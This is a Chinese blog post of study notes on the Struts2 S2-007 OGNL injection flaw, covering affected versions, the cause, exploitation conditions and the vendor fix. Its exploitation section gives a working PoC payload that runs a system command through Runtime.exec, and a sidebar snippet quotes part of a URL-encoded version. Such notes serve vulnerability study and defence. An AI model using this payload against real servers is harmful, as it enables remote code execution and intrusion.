(注入)(RCE)(Struts2)s2-007漏洞学习笔记

最新推荐文章于 2024-08-19 17:13:46 发布
最新推荐文章于 2024-08-19 17:13:46 发布
阅读量278 收藏 3
点赞数 13
文章标签: struts 学习 笔记 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aaaadoga/article/details/140561647
版权

写在前面

这篇文章是关于作者学习s2-007漏洞的笔记
关于这篇文章,如果有建议或问题请留言或联系h3llow0rld@foxmail.com

正文

漏洞分析

漏洞详情页
环境获取
如果想远程调试,参考这篇文章

影响版本

Struts 2.0.0 - Struts 2.2.3

漏洞原理

struts2可以为表单的每个字段设置限定条件并且能依据条件进行简单的类型转换,如果类型转换错误,拦截器会将用户的输入取出,进行字符串拼接后插入值栈,然后对标签进行二次表达式解析,造成OGNL注入

// com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor#getOverrideExpr
protected Object getOverrideExpr(ActionInvocation invocation, Object value) {  
    return "'" + value + "'";  
}
利用条件/测试场景

1.利用条件
有表单,并且应用为表单配置了对应的Validation.xml规则文件
2.测试场景
只要存在表单就可以使用payload进行测试

利用方法

PoC:' + (#_memberAccess["allowStaticMethodAccess"]=true,#context["xwork.MethodAccessor.denyMethodExecution"]=false,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

如何修复
紧急处理方法(仅供参考)

删掉对应的Validation.xml,手动实现对字段的校验和转换

补丁修复方法

对输入进行转义

// com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor#getOverrideExpr
protected Object getOverrideExpr(ActionInvocation invocation, Object value) {  
    ValueStack stack = invocation.getStack();  
  
    try {  
        stack.push(value);  
  
        return escape(stack.findString("top"));  
    } finally {  
        stack.pop();  
    }  
}
h4ckb0ss
关注
  • 13
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(RCE)(Struts2)s2-008漏洞学习笔记
aaaadoga的博客
07-19 206
这篇文章是关于作者学习s2-008漏洞笔记关于这篇文章,如果有建议或问题请留言或联系。
(Injection)(RCE)(Struts2)(笔记)s2-001漏洞学习笔记
aaaadoga的博客
07-17 977
这篇文章是关于作者学习s2-001漏洞笔记对于一个从事安全方向的人,漏洞复现和学习是非常有必要的,一方面是面试时可能会问到;另一方面是学习这些漏洞可以了解漏洞一般是怎么产生的,有助于你自个去发掘0day;还有就是对于安全工具开发者,研究漏洞有助于编写自动化工具实现漏洞的自动检测和利用在我学习一个漏洞的时候,我会以下几个方面入手这个漏洞的原理是什么这个漏洞影响哪些版本这个漏洞在什么环境下能触发这个漏洞怎么利用这个漏洞怎么修复的紧急响应的处理方法最终补丁使用的方法。
BurpSuite插件 Struts2-RCE使用
不想当脚本小子的脚本小子
02-15 365
有道云笔记链接:http://note.youdao.com/noteshare?id=a080e661d6c199818ff90052185dbd39&sub=B8AFFBFA240147B3963094075DFFC4BF
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 6436
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
Struts2著名RCE漏洞引发的十年之思
weixin_34018169的博客
04-19 569
从2007年7月23日发布的第一个Struts2漏洞S2-001到2017年12月发布的最新漏洞S2-055,跨度足足有十年,而漏洞的个数也升至55个。分析了Struts2的这55个漏洞发现,基本上是RCE、XSS、CSRF、DOS、目录遍历和其他功能缺陷漏洞等等。本篇文章,重点关注威胁性较大的那些著名RCE漏洞,也是***们比较喜欢利用的。 要说著名RCE(远程代码执行)漏洞Struts2框架...
Struts2_001_RCE 漏洞复现
ADummy的博客
02-04 413
Struts2_001_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 我们来了解一下Struts2 中的validation机制。validation依靠validation和workflow两个拦截器。validation会根据配置的xml文件创建一个特殊字段错误列表。而workflow则会根据validation的错误对其进行检测,如果输入有值,将会把用户带回到原先提
Struts2-062_RCE的简单复现(CVE-2021-31805)
ANYOUZHEN的博客
06-04 643
漏洞描述:漏洞等级:高危漏洞本次漏洞复现为本地环境,使用开源靶场中的环境:输入指令:docker-compose up -d --buildsudo docker-compose up -d接下来启动漏洞扫描: 但是在我的kali2022上面出现了报错:解决办法在网上找到了一篇大佬文章:[Linux] docker 出现Got permission denied while trying to connect to the Docker daemon socket...问题的解决办法_Cloudeeee
BurpSuite插件 -- Struts2-RCE
weixin_41489908的博客
02-13 1892
​好遗憾,明明不想失去,却又无能为力,说真的,那种想放弃又想爱的滋味,真折磨人。。。。 ---- 网易云热评 一、插件介绍 一个用于检查struts2 RCE漏洞的Burp扩展器 二、下载地址(插件作者:prakharathreya) https://github.com/prakharathreya/Struts2-RCE 三、安装插件 1、将插件导入BurpSuite 2、选择下载好的插件 3、点击下一步 4、导入成功,菜单栏和右击项会多出两个选项 ...
编程的魅力及基础知识和学习路径
z86666610的博客
08-19 100
这包括了解计算机如何工作(硬件与软件的关系)、熟悉基本的数据类型(如整数、浮点数、字符串等)、掌握条件语句和循环结构以实现逻辑判断与重复执行、以及理解函数和模块的概念以实现代码的复用和模块化。从古老的汇编语言到现代的Python、Java、C++等高级语言,每一种语言都有其独特的优势和适用场景,为开发者提供了广阔的选择空间。在数字化浪潮席卷全球的今天,编程已不再是计算机科学专业人士的专属领地,它如同一把钥匙,解锁了通往未来世界的无数可能。在这个充满变革的时代,掌握编程技能,就是掌握了开启未来之门的钥匙。
CVPR2024 | PromptAD: 仅使用正常样本进行小样本异常检测的学习提示
08-16 1008
本文提出的PromptAD模型结构如图2所示。PromptAD建立在VV-CLIP之上,其视觉编码器用于提取全局和局部的特征。本文提出的语义串联(SC)用来设计提示。具体来说,将N个可学习的普通前缀与目标名称串联起来获得普通提示(NPs),然后将这N个普通提示分别与M个手动设置的异常后缀和L个可学习的异常后缀串联,以获得N×M个异常提示(MAPs)和N×L个可学习的异常提示(LAPs)。视觉特征和提示特征用于通过对比损失和本文提出的显式异常边界(EMA)损失来完成提示学习
EmguCV学习笔记 VB.Net 2.S 特别示例
UruseiBest 的技术专栏
08-17 1067
将文字图像生成0和255的二值化图像,使文字部分为黑色(根据实际情况需要考虑反色),然后将文字图像和纹理图像直接相加,文字图像黑色(值为0)的部分相加后为纹理图像的颜色,文字图像白色(值为255)的部分相加后保持白色(255)。8、将加密图像1(mEncPart)和黑色图像2(mnoEncPart)进行直接相加,去除黑色部分,生成背景不加密+区域加密的最终图像(mResult)。4、加密图像(mEnc)和随机值图像(mKey)进行Xor操作,将加密图像解密,生成解密图像(mDec)。
学习node.js 三 child_process 子进程
tian_liang_jia的博客
08-18 386
1. spawn 用于执行一些实时获取的信息因为spawn返回的是流边执行边返回,exec是返回一个完整的buffer,buffer的大小是200k,如果超出会报错,而spawn是无上限的。execFile 适合执行可执行文件,例如执行一个node脚本,或者shell文件,windows可以编写cmd脚本,posix,可以编写sh脚本。子进程是Nodejs核心API,可以写一些shell命令或者编写前端工程化工具之类的,他也有很大的用处,以及处理CPU密集型应用。execFileSync 则使用的较少。
如何高效记录并整理编程学习笔记
探索IT世界
08-16 714
建立一个高效的编程学习笔记系统是一个持续的过程。选择合适的工具,设计清晰的笔记结构,并结合实践与复习,可以帮助我们更好地掌握编程知识。记住,笔记的价值在于其使用,不断优化你的笔记系统,让它成为你学习路上的得力助手。希望这篇博客能够为你在IT行业的职业发展提供一些启发和指导。如果你有任何问题或需要进一步的建议,欢迎在评论区留言交流。让我们一起探索IT世界的无限可能!《IT入门知识大纲(0/10)》《IT入门知识第一部分《IT基础知识》(1/10)》《IT入门知识第二部分《编程语言》(2/10)》
学习“卷积”
he1223991940的博客
08-16 234
在一维情况下,卷积可以定义为:
EmguCV学习笔记 VB.Net 2.2 Matrix类
UruseiBest 的技术专栏
08-15 974
Matrix类是EmguCV中的一个矩阵类,它可以用来存储和处理矩阵数据,可以处理任意维度的矩阵。与Mat类相比,Matrix类提供了更多的矩阵运算方法,如矩阵加减、乘法、逆矩阵等,也更加灵活,而且底层实现也更加高效。例如,当均值为0,标准差为1时,生成的随机矩阵的像素值符合标准正态分布。当均值为0,标准差为0.5时,生成的随机矩阵的像素值分布更加集中,更接近于均值。该控件位于【工具箱】|【Emgu.CV】下面。SetRandNormal方法只能生成正态分布的随机矩阵,不能生成其他分布的随机矩阵。
算法的学习笔记—链表中倒数第 K 个结点(牛客JZ22)
业精于勤,荒于嬉
08-16 960
通过使用双指针技术,我们能够高效地找到链表中的倒数第 K 个节点。这种方法不仅简单明了,而且在大多数情况下都能提供良好的性能表现。在处理链表相关问题时,双指针技术是一个非常有用的工具。希望本文的讲解能帮助你更好地理解和解决类似的链表问题。😁热门专栏推荐想学习vue的可以看看这个java基础合集数据库合集redis合集nginx合集linux合集手写机制微服务组件spring_尘觉springMVCmybits🤔欢迎大家加入我的社区尘觉社区。
[Linux]如何在Ubuntu中安装Docker,并且学习基本操作?
最新发布
c858845275的博客
08-19 691
讲述了Docker的部署和基础的使用方式
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值